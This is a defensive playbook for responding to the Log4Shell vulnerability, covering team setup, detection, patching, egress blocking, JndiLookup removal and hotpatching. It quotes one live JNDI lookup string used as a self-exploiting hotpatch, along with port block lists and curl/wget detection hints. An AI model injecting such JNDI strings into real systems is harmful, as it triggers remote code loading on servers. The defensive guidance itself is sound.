Slay the Log4Shell Dragon TEAM 1 - Protect and Detect Vulns Playbook
Struggling with how to tackle the Log4J / Log4Shell Dragon and low on resources?
First, start with my “RAPID LOG4SHELL RESPONSE 1-PAGER - 8 STEP CHECKLIST” to begin immediate actions to tackle this issue. In that 1-pager, I provide concise guidance to get started quickly. However, for medium and larger sized companies, this approach might not be enough, although it is a great and immediate start.
Simply patching alone will likely not meet the expectations in the case of the Log4J / Log4Shell vulnerabilities, if there is a breach. A more comprehensive approach is required to reduce risk. I’ve therefore put this playbook together to help go above and beyond just a patching-based approach and hope it proves useful.
My goal was to provide something that would help ensure a high enough level of due diligence for risk reduction of this issue.
In this article I’ll provide a TEAM 1 PLAYBOOK of recommended tasks and guidance
Here’s what I recommend to respond to this critical vulnerability:
INITIAL STEP – Quickly put together two high-performance teams or HPTs. One team should focus on security engineering related to the issue to enable protection and detection. The second team should focus on compromise detection via hunt and response actions.
Both teams should collaborate closely, but their focus is different and should be worked in parallel. Here’s what I recommend for these two teams and task areas or lines of ops, to be done simultaneously:
Team/Task Area 1 for immediate protective and detective security engineering
- Mission: Protect, instrument and defend the enterprise quickly from Log4J vulnerabilities
- Goal: Complete tasks within 30 days and then transition to longer-term process
Team/Task Area 2 for immediate compromise detection hunt actions and attack response
- Mission: Hunt for signs of Log4J compromise and quickly respond, share, defend
- Goal: Complete tasks within 30 days and then transition to longer-term process
Purpose of this playbook: to provide recommended Immediate Actions and Response Playbook to answer the question: “What should be done ASAP to Defend Against the Log4Shell Dragon? This will be done for the above two teams and lines of effort.
Leadership, Cooperation and Communication are Essential Elements of Success
Leaders such as the CISO, directors and managers within IT and Security should put deliberate measures in place to facilitate cooperation and timely communication by the team. This requires top-down leadership and engagement as well as a spirit of cooperation and teamwork. Anyone getting in the way of that is a detriment to the organization and must be effectively dealt with immediately.
Setting up a quick information and response communications portal is a smart move
I liked the example I saw used by the University of Washington Office of the CISO portal for Log4Shell to provide quick and pertinent information to their team:
In fact, if you’re a small or medium-sized organization and only have one or a handful of folks to tackle this issue, then the UW site just mentioned may be a good place to start. However, the items contained herein are probably still doable, and there are many options to select from. Not everything can or should be done, the decision is entirely yours.
Providing a single pane of glass is important (like the UW CISO site mentioned above). It provides for an easy one-to-many portal to communicate with the team and provide timely guidance, updates and resources.
Note how the UW site made it a point to provide specific and detailed instructions to exact-named functional areas within IT and cyber such as "if you are a systems administrator do "X" – if you are a firewall administrator or systems administrator to “Y” and “Z”, etc. Great approach!
A Team Effort and Can-Do Attitude Required
This is not the time for whining and complaining nor being uncooperative or protecting territory. This is the time for cooperation and team spirit. Leaders must ensure everyone plays nice and does not work against the process due to other priorities.
Why I Did This
You may ask why I spent time putting this together, when many other organizations have already put such things together, such as CISA? That’s simple. I felt the overall method to organize and tackle this for larger enterprises is set up for high friction and potential burnout.
I also think many tools have been tossed out there without a better understanding of their strengths and weaknesses. If you look at my other post where I provided a Log4J Log4Shell scan tool compilation, I provide some additional and noteworthy advice. This advice includes a prioritized list and caveats on the limitations and potential consequences of tool use. Please take a moment to read and heed that advice for any teams planning to tackle this issue comprehensively.
Another point - there is great advice out there, but it seems to mix short and long-term strategies and perhaps key tidbits of information in many places. I decided to analyze these and consolidate to save organizations some time. Also, some advice - though great - may be enhanced by providing a process and framework, such as what I propose here. For example, CISA says:
"Immediately identify, mitigate, and update affected products that use Log4j to the latest patched version." Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
Very true, but also much easier said than done. This could result in chaos if one is not careful. Log4J logging is used probably by a ton of software and code. Way too many to tackle all at once, for sure. This must be prioritized and could take time. What should one do immediately?
This is why I've decided to try to put something together as a more consolidated playbook of ideas, concepts and advice to result in a more realistic, risk-based and comprehensive response, using a divide-and-conquer strategy. My goals were to:
- Approach this in a more strategic, risk-based and systematic way with less friction
- Divide up initial response strategy from what should become a longer-term strategy
- Provide advice to help “divide-and-conquer” and achieve “unity-of-effort”
- Provide more consolidated advice in one place as a structured plan and template
- Provide enduring defense-in-depth and other pertinent advice and reminders
- Provide important points to think about as you plan your response and remediation
- Emphasize the human side of things – leadership, communication and teamwork
Note: this first playbook would not have been possible without the generous contributions of the entire cybersecurity community. My hat is off to them for quickly developing many great resources in a short time. Many of these are linked in my articles, reflecting that this is a team effort at the end of the day. I hope this will provide some efficiencies to help others avoid burnout and help make the efforts more manageable and Frictionless.
Caveats: Links and advice at links or tools have not necessarily vetted - Quality of resources not known nor tested – visit links and/or follow advice herein completely at your own risk.
===================================================================
TEAM 1 - IMMEDIATE ACTION PLAYBOOK TO DETECT and PROTECT
====================================================================
OUTLINE
After spending some time to establish leadership, team and organizational communication protocols, the time has come to execute a diligent response. The goal of this information is to provide details to help “Protect, instrument and defend the environment quickly”
While I have arranged this information to be used in a sequential manner (in case the team is small) I have also arranged it so these tasks can be assigned using a “divide-and-conquer” strategy.
This means network admins, system admins, application admins, cloud admins, security admins, SOC and Incident Response and other teams should be assigned against these tasks working in parallel. Establish a cadence or “battle rhythm’ for management purposes.
Here are the 9 critical steps for TEAM 1 – modify according to your own needs and context:
#1 – QUICKLY LEARN and INSTRUMENT DETECTIONS USING EXISTING SECURITY TOOLS
#2 – PATCH INTERNET-FACING SERVERS AND PRODUCTS FIRST
#3 – BLOCK OUTBOUND DATA TRAFFIC RELATED TO THE LOG4J VULNERABILITY
#4 – DISABLE LOG4J JNDI LOGGING IF NOT NEEDED
#5 – CHANGE PROPERTIES SO NO LOOKUPS OCCUR - IF UNABLE TO PATCH
#6 – INOCULATE AND/OR HOTPATCH IN THE INTERIM IF FEASIBLE
#7 – DEPLOY A WAF (THIS IS A THIN LAYER and AUTOMATED UPDATES ARE A MUST!)
#8 – ISOLATE VULNERABLE SYSTEMS THAT MUST USE JNDI - INTO UNTRUSTED VLAN(s)
#9 – START PATCHING OTHER CRITICAL SYSTEMS, PREPARE TO TRANSITION TO TIGER TEAM for the LONG-TERM
============================================================
REPORTING TEMPLATE - RESPONSIBLE TEAM LEADS - POCs
============================================================
Divide and conquer on all of these major recommended task items and assign responsible points-of-contact or POCs. Tailor as you see fit and based on your risk context. Assign each task to a responsible team lead and specific team functional areas and use a time-based approach for progress and completion.
Example and basic template are provided below, feel free to cut-and-paste into a word doc and create your own plan-of-attack:
#1 – QUICKLY LEARN and INSTRUMENT DETECTIONS USING EXISTING SECURITY TOOLS
EXAMPLE
- Who: Cybersecurity SOC and Engineering Teams (may need to form a quick high-performance team, or use existing team and process but escalate as emergency ticket/action)
- Reporting Cycle: Daily Progress Meeting at 1630 PST (establish a cadence or “battle rhythm”)
- Responsible Leader: Jane Doe (responsible for item completion and attends progress meetings)
- By When: 30 Days – No later than X Date
#2 – PATCH INTERNET-FACING SERVERS AND PRODUCTS FIRST
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#3 – BLOCK OUTBOUND DATA TRAFFIC RELATED TO THE LOG4J VULNERABILITY
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#4 – DISABLE LOG4J JNDI LOGGING IF NOT NEEDED
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#5 – CHANGE PROPERTIES SO NO LOOKUPS OCCUR - IF UNABLE TO PATCH
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#6 – INOCULATE AND / OR HOTPATCH IN THE INTERIM IF FEASIBLE
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#7 – DEPLOY A WAF (THIS IS A THIN LAYER and AUTOMATED UPDATES ARE A MUST!)
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#8 – ISOLATE VULNERABLE SYSTEMS THAT MUST USE JNDI - INTO UNTRUSTED VLAN(s)
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
#9 – START PATCHING OTHER CRITICAL SYSTEMS, PREPARE TO TRANSITION TO TIGER TEAM for the LONG-TERM
- Who: TBD (organizations – use this template to fill in the blanks!)
- Reporting Cycle: TBD
- Responsible Leader: TBD
- By When: TBD
Once established, corresponding actions are provided below so teams can get to work on items via “divide-and-conquer”
==============================================================
TEAM 1 RESPONSE - DETAILED INSTRUCTIONS
===============================================================
Note: Run as many of these in parallel as possible, particularly items #1 and #2 below
========
#1 – QUICKLY LEARN and INSTRUMENT DETECTIONS USING EXISTING SECURITY TOOLS
- This should include FIREWALL, IDS/IPS, EDR, etc. – any pertinent IT tools and logging capabilities that should be set up for detection and query – and automate if able
- The reason I put this one first is because if you lack visibility and detections you’re blind and unable to defend what you cannot see
- Since attacks are already happening - patching externally facing servers especially Apache should be done quickly – this won’t stop already-occurring attacks and already-compromised environments – that’s why TEAM 2 must in parallel HUNT and RESPOND as needed!
A. Focus on Cyber Tool (Antivirus, IDS/IPS, Firewall, EDR) Patching and SIEM Instrumentation
Ensure EDR and Antivirus are running on servers where possible (Apache, Internet-facing/DMZ, etc.) and providing instrumentation to the SIEM with high alerts in case of attacks. This should be tested as well, to be sure the alerts and detections actually work.
Also these security and IT products must also be updated to themselves be protected against Log4J / Log4Shell attacks! As such, have the team lead verify this as two critical metrics as follows:
A1. Log4Shell Metric Group 1 – All security, monitoring and SIEM tools and services (aka “cyber capabilities”) have been engineered to protect against Log4Shell (patched, and/or configured, as applicable) and have been tested and verified as not vulnerable:
- Capability 1 – Managed SOC Service provider (as applicable) - Green
- Provider 1 – SOC – Green – Confirmed/tested and documented
- Provider 2 – EDR Managed service – Green - Confirmed and documented
- Etc. as applicable
- Capability 2 – Managed Cloud service provider (as applicable) - Orange
- Provider 1 – AWS – Red – awaiting reply
- Provider 2 – Azure – Green - Confirmed and documented
- Provider 3 – O365 – Yellow – verbal confirmation, awaiting written
- Etc. as applicable
- Capability 3 – PKI Server – Green - Confirmed and documented
- Capability 4 – SIEM – Red – Vulnerable, awaiting vendor patch
- Capability 5 – Secure Email Gateway – Orange – patch avail, not yet deployed
- Capability 6 – Antivirus – Yellow – patch available, deployed, not yet tested/verified
- Capability 7 – EDR/EPP – Green - Confirmed and documented
- Capability 8 – IDS/IPS – Green - Confirmed and documented
- Capability 9 – NGFW – Green - Confirmed and documented
- Capability 10 – SOAR – Green - Confirmed and documented
- Capability 12 – VPN – Green - Confirmed and documented
- Capability 11 – Etc…as applicable (if you don’t have an enterprise cybersecurity capabilities list – this would be the time to create a basic one, and therefore have an inventory of them and eventually include them in some form of risk register!)
Note: this is a long process, and only a 1-time static check. This is not continuous risk assessment and control, and thus it is a minimal approach. It is thus highly recommended to automate this testing, validation and verification using tools that can do this in a single pane of glass, as a force-multiplier.
A2. Log4Shell Metric Group 2 – All security cyber capabilities have been engineered to detect Log4Shell exploits in 2 respects:
- A2a. Detection in place and successfully tested and verified the detecting works correctly
- A2b. Corresponding alerts fire successfully to SOC dashboard/attention/ticketing (SOAR-like capability or other orchestration and API-based capability or configs needed) with corresponding medium or high alert per preference and context (example: critical = known exploit, high = unknown if exploited – investigate/hunt (automation preferred), medium = was attacked but not exploited)
for the following (status exampled provided as one idea, do it as you see fit)
- Capability 1 – Managed SOC Service provider (as applicable, and manual) - Orange
- Provider 1 – SOC – Red – unable to verify
- Provider 2 – EDR Managed service – Green - Confirmed and documented
- Etc. as applicable
- Capability 2 – Managed Cloud service provider (as applicable, and manual) - Orange
- Provider 1 – AWS – Red – awaiting reply
- Provider 2 – Azure – Green - Confirmed and documented
- Provider 3 – O365 – Yellow – verbal confirmation, awaiting written
- Etc. as applicable
- Capability 3 – PKI Server – Yellow – Detection confirmed and safely logged; alert not developed
- Capability 4 – SIEM – Red – Not tested
- Capability 5 – Secure Email Gateway – Yellow – Detection tested; alert works, needs tuning/fix
- Capability 6 – Antivirus – Green - Confirmed and documented
- Capability 7 – EDR/EPP – Green - Confirmed and documented
- Capability 8 – IDS/IPS – Green - Confirmed and documented
- Capability 9 – NGFW – Green - Confirmed and documented
- Capability 10 – SOAR – Green - Confirmed and documented
- Capability 12 – VPN – Green - Confirmed and documented
- Etc…as applicable
Team 2 metrics will be discussed in forthcoming article 2B portion.
By doing this above using the stoplight colors as one option - you will immediately make your priorities visible to everyone - and help the team prioritize items that need to be "greened up" as they say.
Also, by no means is this a complete list of security tools running in the environment. I recommend the cyber and IT side work together to come up with the list. Then, divide and conquer - in a prioritized way. Report status to CISO and CIO daily or per desired cadence.
B. Other Advice related to ITEM # 1
Article 2B will talk about this and the need for Team B work with Team A (doing this stuff) to ensure tests are conducted. Also this should provide protection, provided that Antivirus and EDR are kept up to date and configured to block malicious activities related to Log4J.
Focus on INTERNET-FACING SERVERS first (DMZ, bare metal on prem and virtual, containers, cloud-based) with a focus on externally facing servers first, Apache servers foremost. Then move to internal servers when able. Don’t try to tackle everything all at once.
If you are unsure what to patch, then use this list of recommended Log4J vulnerability scanning tools starting with existing tools in the environment first, such as vulnerability scanners and/or powershell.
“Detection and Alerting Assurance” is a must
Ensure Antivirus and EDR instrumentation works and is going to the SIEM from these servers. Be prepared for an uptick in storage requirements and cost when sending more data to the SIEM. This is because NGFW and EDR gather a lot of telemetry.
Some security solutions also offer storage options (30, 60 or 90 days’ worth in some cases). Ideally the organization should have a data lake for retro threat hunting include as part of the solution. If you did not get this included, you should re-look at your negotiation on renewal.
Also, employ other scalable options to realize cost savings. There’s also a smart strategy to store data in a way that’s efficient and cost-effective, as well as compliance-oriented (all of these are needed today). A few of these solutions also include SIEM and analytics as part of their storage and retro-threat-hunt solutions.
Keep all security solutions up-do-date continuously and track/monitor them so
A. Patching occurs quickly and is verified continuously
B. Configuration changes not authorized are quickly detected and responded to
C. Alerting effectiveness gaps and tuning requirements get fixed quickly
This is needed for 3 important reasons related to vulnerability management and detection:
- So the tools keep up with the latest Log4J vulnerability and other detections and vulns/RCEs (don’t lose sight of all the other vulnerabilities and RCEs)
- So these solutions themselves are protected from Log4J exploit if vulnerable (this is a possibility – and is why security solutions themselves need advanced depth
- To fix any bugs with detections and alerting so the SOC can detect and respond quickly
C. Use Existing Security Tool Detections for Log4Shell
Example – EDR. Per Infocyte, here is what to look for using EDR: “If you have EDR on the web server, monitor for suspicious curl, wget, or related commands. Likely the code they try to run first following exploitation has the system reaching out to the command and control server using built-in utilities like this.” Ref: https://www.infocyte.com/blog/2021/12/11/log4j-exploit-detection-cve-2021-44228/ See bottom of this article for additional thoughts about EDR importance.
Be sure to keep up with detection specifics for whatever tool you are using – see customer portals for advice or ask vendor security engineers. The cyber threat intelligence team or analyst should make sure this becomes an intelligence priority requirement as well. Analysts must provide critical and timely “threat intel assurance” to users of such tools, the SOC and threat hunters.
Automating this process where possible is also a goal, but may not be possible in the immediate. However, if it requires only a small effort and can persist, this is worth pursuing at the earliest.
GET EDR Y'ALL!
If you don’t have EDR either consider a trial deployment of use SYSMON and instrument these on critical servers. Have alerts based on external and internal assets for detection prioritization. These detections should be sent to a SIEM for alerting and response, as Splunk points out below.
If you already have an EDR then this step may not be necessary if alerts are being collected centrally. Security teams should determine their detection requirements and level of detection redundancy and instrumentation needed, based on risk and their defense-in-depth strategy. See below in Appendix A for more information on SYSMON and EDR-based detection advice.
D. Use Existing Vulnerability Management and Scan Tools to detect Log4Shell like Rapid7, Qualys and Tenable to detect Log4J Vulnerabilities to patch, determine what’s most critical and patch quickly
Links I found – ask vendors or use your customer portals as applicable:
Nessus (and others) may offer a free version for select number of IP addresses to scan, but don’t quote me. Vendors will surely offer free tests and Log4J provides a great option to see how good their tools can do to help before making a purchase decision.
- Don’t be shy – vendors are eager to help – just be sure you develop some criteria for selecting the right product if conducting a trial or proof of concept (POC).
- NMAP also has some Jog4Shell scanning plugins, use at your own risk since any free tool does not come with any guarantees
E. If needed, ask your vendors for detection advice and resources to verify and update most current signatures (especially if unable to find any on their sites or in their subscription customer portals.) Products like Splunk and CrowdStrike and others may have detection and hunting query advice or other tidbits at their sites. Here are examples:
=====================================
#2 – PATCH INTERNET-FACING SERVERS AND PRODUCTS FIRST.
Then focus on internal servers, devices, products and libraries, when able. I recommend a transition to a longer-term strategy and Tiger Team upon completion of these playbook item (30 day mark is ideal.).
Again, if you are unsure what to patch, then use this list of recommended Log4Shell vulnerability scanning tools starting with existing tools in the environment first, such as vulnerability scanners and/or powershell.
- IF POSSIBLE RUN ITEMS #1 and #2 IMMEDIATELY IN PARALLEL (this item and the previous)
- Patching is critical especially for most vulnerable assets exposed to the Internet and must be dealt with quickly
- this is why I included a recommendation above regarding where to start first
- companies should determine their most critical products to patch ASAP via initial list and then stary building an overall master list
- Start on the critical list now; start the master list upon transition to the longer-term Tiger Team or project-based strategy
As mentioned, the focus should first be on externally facing devices and servers (all devices, not just servers!) Test if unsure what these assets are and if reachable by the Internet, and if vulnerable to Log4Shell. Ask the networking and web team to provide a complete list of company Domains and IPs. Use trusted scanners to check and verify nothing is missed.
CISO and CIO should agree on a quick timeline where all external internet-facing servers and assets are patched and defended – I recommend within 48 hours or less for all externally facing and Apache servers or sooner if possible – for any RCE exploit, anytime. If IT and cyber have not resourced themselves to be able to do that then I recommend they do so.
Upguard and CISA recommend “updating to the latest version of the Log4j Library
The quickest, and currently most effective, mitigation response is to upgrade all instances of Log4j to latest version…[via] https://logging.apache.org/log4j/2.x/download.html “
Upguard further says: “According to Apache, the vulnerability CVE-2021-45105 is fixed in its latest library version. This should prevent future attacks but it will not remediate any damage caused before the library upgrade. [This is why TEAM 2 is CRITICAL -- to determine compromise!]
Because this vulnerability is so widespread, it is safest to assume that your ecosystem was compromised prior to a library upgrade and to initiate data breach incident responses immediately.” [emphasis mine] Ref: https://www.upguard.com/blog/apache-log4j-vulnerability and earlier mention of CISA’s guidance https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
Patching requires diligent upkeep. Sometimes a patch may provide only a partial fix but may cause other issues that require more patches. This has already been seen with respect to Log4J. Patching is not a fix-and-forget scenario. Nor is it something to solely rely upon.
Keep up with the latest and assign responsibility for this critical function using a trustworthy and reliable method that can endure. Attacks like Hafnium, SolarWinds and Log4Shell should have made this an enduring priority, if it was not already.
=====================================
#3 – BLOCK OUTBOUND DATA TRAFFIC RELATED TO THE LOG4J VULNERABILITY
- I felt this one could be a quick fix with less friction and impact since these services are perhaps rarely used yet can effectively block currently known exploit methods
- Realize as attackers change tactics there could be ways to bypass or use other protocols or means of exploit – also it has been stated below it is not 100% but when is anything?
CISA advises:
“Block specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic.
Outbound LDAP: for most networks, LDAP is used internally, but it is rare for LDAP requests to be routed outside a network. Organizations should block outbound LDAP or use an allowlist for outbound LDAP to known good destinations. Note: this may be difficult to detect on certain ports without a firewall that does application layer filtering.
Remote Method Invocation (RMI): for most networks, RMI is either unused or used for internal sources. Organizations should block outbound RMI or use an allowlist for outbound RMI to known good destinations.
Outbound DNS: organizations using enterprise DNS resolution can block outbound DNS from sources other than identified DNS resolvers. At a minimum, blocking direct outbound DNS from web application servers configured to use enterprise DNS resolution will mitigate the risks to those systems.
Note: blocking attacker internet IP addresses during this event is difficult due to the high volume of scanning from non-malicious researchers and vendors. The false positives on IP addresses are high. Organizations should focus on looking for signs of successful exploitation and not scans.”
Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
Also Snyk says: “A solution here is to update your egress policies, perhaps through your Kubernetes configuration or other mechanisms in your environment to restrict outbound requests that look like they’re performing malicious naming lookups from Log4j.
Similar to WAF, this is not a flawless fix, as it is still possible to construct malicious payloads even without an external LDAP network request (for example, the case described earlier with Tomcat servers) via vulnerable gadgets.”
Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
Echelon Cyber advises this for network restrictions:
- “Using your perimeter firewalls, restrict outbound access from your internet facing servers, particularly web servers
- Change outbound firewall rules from web and application servers to default deny
- Turn off recursive DNS on your web and application servers”
Ref: https://echeloncyber.com/intelligence/entry/log4shell-how-attackers-are-currently-breaking-the-internet-and-how-to-mitigate-log4j
Specifics [ports and protocols] are provided by Peerless:
“Egress Filtering: Implement firewall rules that prevent your servers (and any other device) not requiring unlimited Internet access from making requests to the Internet.
[Best - Whitelist Approach]
“First, create a “Deny All” rule from the Source(s) to the Internet or “Any”/0.0.0.0 if you intend to restrict all access not explicitly allowed by a higher priority rule.
Then, create Allow rules from the Source(s) to any needed Destinations. For example:
Internal Networks or specific destinations.
DNS (53/tcp) and DNS (53/udp) to its configured DNS server addresses.
Microsoft Update (if patches are not internally deployed)”
[Quick-fix - Blacklist Approach]
“If you specifically wish to block the currently known "Log4Shell" exploits, block outbound LDAP (389,1389,636,1636/tcp) [except to legitimate LDAP servers] and outbound Java RMI (1099/tcp,udp).”
[Peerless also provides the following below for what is known so far, just be careful because these things could change as attackers modify their TTPs to include using non-standard ports, obfuscation, etc. Also remember attackers may find other bypasses, so it behooves organizations to develop and be driven by timely and highly specific cyber threat intelligence]
“Log4Shell malware has specifically been using outbound LDAP (389,1389,636,1636/tcp) and outbound Java RMI (1099/tcp,udp). Once the Log4Shell malware has compromised a machine, LDAP / RMI are no longer needed, so the payload it installs will likely communicate over other protocols and ports”
Ref: https://blog.getpeerless.com/what-to-do-about-the-log4j-vulnerabilities
=====================================
#4 – DISABLE LOG4J JNDI LOGGING IF NOT NEEDED
- The reason this one is #4 is because it may have unintended consequences - but it effectively kills the exploit process if done right - but - may have some unintended consequences and it needs to be done in every place Log4J logging occurs
- I felt it was an important item but may require some analysis and risk decision process - which could delay things slightly
Turn JNDI logging off completely if not needed, or do what CISA recommends and temporarily disconnect the stack from the network (or segment it with certain inbound and outbound rules, etc.) This could have unintended consequences though, may want to test quickly.
Consider the risk may be worth disabling and should be tested by the technicians and considered by leadership based on risk. Each company should determine what is acceptable. I’m not responsible for issues this may cause, follow any of this advice at your own risk.
There will be some consequences and tradeoffs, be ready for those. Ensure the right level of leadership makes the decision regarding the risk and consequences. Every stakeholder should push such decisions to the right level ASAP regarding such things, and should not accept risk on behalf of the entire company – this decision is above their pay grade and needs to at minimum float to the CISO and CIO.
Upguard provides some info for how to do disable JNDI logging per: https://www.upguard.com/blog/apache-log4j-vulnerability
“To disable JNDI lookups:
Vulnerable versions of Log4j can also be secured by removing JndiLookup class from the following classpath:
zip -q -d log4j-core- *.jar org /apache/logging /log4j /core/lookup /JndiLookup.class
Also “Note: for *any* version you can delete the JndiLookup.class
Note: Hosts running on JDKs versions higher than 6u141, 7u131, 8u121 will be protected against the LDAP class loading vector BUT NOT the deserialisation vector. This is because com.sun.jndi.ldap.object.trustURLCodebase is disabled by default, hence JNDI cannot load remote codebase using LDAP. But I must stress deserialisation and variable leaks are still possible.”
Ref: https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
Also SNYK has some instructions as well at item #3 on their page for “Remove the Log4j lookup capability” and they give the caveat that “Removing this on running environments is not enough by itself, you will also need to restart your JVM environment.
If you’re using a Tomcat server, for example, you’ll need to stop and start the server. An example command to remove the class file from your JAR is as follows:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
It is also a good idea to remove other classes at the same time which could also be used in this or similar attacks. These files include JndiManager, JMSAppender, and SMTPAppender. Be warned that removing classes from a runtime environment may cause unexpected behavior.”
Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
=====================================
#5 – CHANGE PROPERTIES SO NO LOOKUPS OCCUR - IF UNABLE TO PATCH (or just do this as an added layer of protection if needed, proceed with caution)
- I decided this one is #5 because of a few caveats that can be seen below – it might cause some resource availability issues, added work and is only a partial fix at that
To do this, Upguard, recommends: “If upgrading to the latest Log4j version isn’t possible, security teams should implement the following response immediately for versions 2.10 to 2.14.1:
Either set the following system property to true:
log4j2.formatMsgNoLookups
Or set the following environment variable to true:
LOG4J_FORMAT_MSG_NO_LOOKUP
Ref: https://www.upguard.com/blog/apache-log4j-vulnerability
Snyk gives these caveats for this method: “Similar to the removal of Log4j files, these changes will require a JVM restart, which might mean stopping and restarting your Tomcat server (for example) so that the new properties can be used.
Note that it has been discovered that this approach is a partial fix only.” Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
CISA caveat “This option, while effective, may involve developer work and could impact functionality.” Ref: https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures
=====================================
#6 – INOCULATE AND / OR HOTPATCH IN THE INTERIM IF FEASIBLE
- I decided to make this one #6 because they may require some level of effort to test, configure, deploy, make corrections, etc.
- There are unknowns with any free product produced so quickly - these could have unintended consequences and I have not tested these nor can vouch for how effective they are – test and verify
Solutions that seem promising – Cybereason, Lunasec Hotpatch, Traceable AI’s product, etc.
I HIGHLY recommend that any tool used be tested on an isolated test environment first. I also HIGHLY recommend that any tool downloaded should include first reading any readme file or information available on GitHub and follow vendor/producer’s instructions. Use at your own risk!
Doing these could reduce potential operational risk to the network. Caveat: if any adverse things occur on the test side, or if the scan or tool is found to be clumsy or inadequate, then obviously do not use it on the live network.
The team should Vaccinate as soon as possible and provide any immediate protections (such as hotpatch) in the interim against the Log4J vulnerabilities, especially if normal patching will take longer than a few days.
Below are the 3 resources to help, I have not used or tested these nor make any guarantees. Again, I highly recommend testing first before deploying or using.
-------
A. Cybereason Logout4Shell Inoculator called “Logout4shell”
https://github.com/Cybereason/Logout4Shell
CISecurity says to use caution (https://www.cisecurity.org/log4j-zero-day-vulnerability-response/) as any automated solutions that perform mitigation could have unintended effects. I make no guarantees, use at your own risk. Cybereason says:
“The previous version of the Vaccine used the Log4Shell vulnerability to remove the JNDI interpolator entirely from all logger contexts to prevent the vulnerability from being exploited in the running JVM (server process).
This update not only fixes the vulnerability, but also edits the jar file on disk to remove the JndiLookup class to permanently mitigate the Log4Shell vulnerability on a running server. It also performs additional changes on the plugin registry.
Due to the nature of the permanent solution, there is nominal risk involved, so the Vaccine offers the option to execute the completely safe but temporary solution, or the slightly more risky but permanent solution. The documentation has been updated to reflect that I now support both options.
The Log4shell vulnerability still requires patching. This updated Logout4Shell mitigation option can provide security teams the time required to roll out patches while reducing the risk from exploits targeting the Log4j vulnerability.”
Ref: https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228 [emphasis mine]
-------
B. Lunasec Hotpatch
https://www.lunasec.io/docs/blog/log4shell-live-patch/
"If you find yourself stuck between a rock and a hard place for fixing this issue at your company, you might find yourself wishing for something better. Fortunately, the clever people of the internet have come up with a solution that may help you remedy this painful situation.
By placing this string...
${jndi:ldap://patch.log4shell.com:1389/a}
...anywhere you can in your infrastructure that you're vulnerable to Log4Shell, you will be rolling out a temporary fix that gives you more time to patch.
We run that server, but it's been built due to the work of many smart people working on and dealing with the fallout from Log4Shell. I've just made it a little easier for you to use by hosting it for you.
This string will attempt to exploit the Log4Shell vulnerability and apply a patch to your live system. While this patch has been tested on a number of systems, your system might be different and could possibly crash. You have been warned."
If it doesn't work for some reason, your server will hang and possibly need a manual restart.”
Ref: https://www.lunasec.io/docs/blog/log4shell-live-patch/
[emphasis mine…they also provide the code to do this yourself – please realize that if you use their solution you may be subjecting your network to unknown risk so be very careful – the tradeoff might result in an immediate temporary fix and depending on various factors, this risk decision is entirely yours. Great to see they offer a manual solution option to keep your data internal. Just realize any tool may have unknown code, use at your own risk]
-------
C. Inoculate using the Traceable AI Solution. Again this sounds promising and may be a good quick fix worth exploring. I make no guarantees. Note also this and other solutions are likely “freemium” and offer a free trial initially but eventually will require cost to maintain. Again consider these things carefully before becoming dependent on any external trial or tool. See:
https://www.traceable.ai/free and https://www.traceable.ai/log4shell_quick_start_protection
also note they state:
“By default, Traceable Java tracing agent will block all JNDI lookups. If your existing application cannot function and log properly with JNDI Lookup disabled, you can still enjoy the protection of Traceable. To NOT disable JNDI lookup, set environment variable on the application pod as follows:
env var TA_BLOCKING_LOG4J2_JNDI=false
If you encounter any issues with deployment or use please reach out with any comments, questions, or concerns to support@traceable.ai”
Per the earlier provided CIS link, they also quoted TrustedSec’s instructions for how to do this:
“If it is not possible to upgrade, there are several mitigation tactics that can be performed.”
For Log4j versions >= 2.10, set the log4j2.formatMsgNoLookups system property to true on both client- and server-side components.
This can be done in multiple ways:
Add -Dlog4j2.formatMsgNoLookups=true to the startup scripts of Java programs; or
Set the following environment variable: LOG4J_FORMAT_MSG_NO_LOOKUPS=”true”
For Log4j versions from 2.0-beta9 through 2.10.0, remove the JndiLookup class from the classpath. For example
zip -q -d log4j-core-*.jar
org/apache/logging/log4j/core/lookup/JndiLookup.class
Again that was per TrustedSec Ref: https://www.trustedsec.com/blog/log4j-playbook/
-------
CISA Recommended Hotpatches:
NCC Group: log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://github.com/corretto/hotpatch-for-apache-log4j2
Amazon AWS:
GitHub page: https://github.com/corretto/hotpatch-for-apache-log4j2
Blog: https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/
Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
=====================================
#7 – DEPLOY A WAF (THIS IS A THIN LAYER and AUTOMATED UPDATES ARE A MUST!)
- If no WAF existed prior, this would require some logistics so I put it as #7
- This one could have easily been #1 if an NGFW exists already in the right place or may already be done and just needs to be verified or enabled
- This one may also involve some configs and architecture changes and is not a very strong solution so again I made it #7
Per CISA “Deploy a properly configured Web Application Firewall (WAF) in front of the solution stack. Deploying a WAF is an important, but incomplete, solution. While threat actors will be able to bypass this mitigation, the reduction in alerting will allow an agency SOC to focus on a smaller set of alerts.”
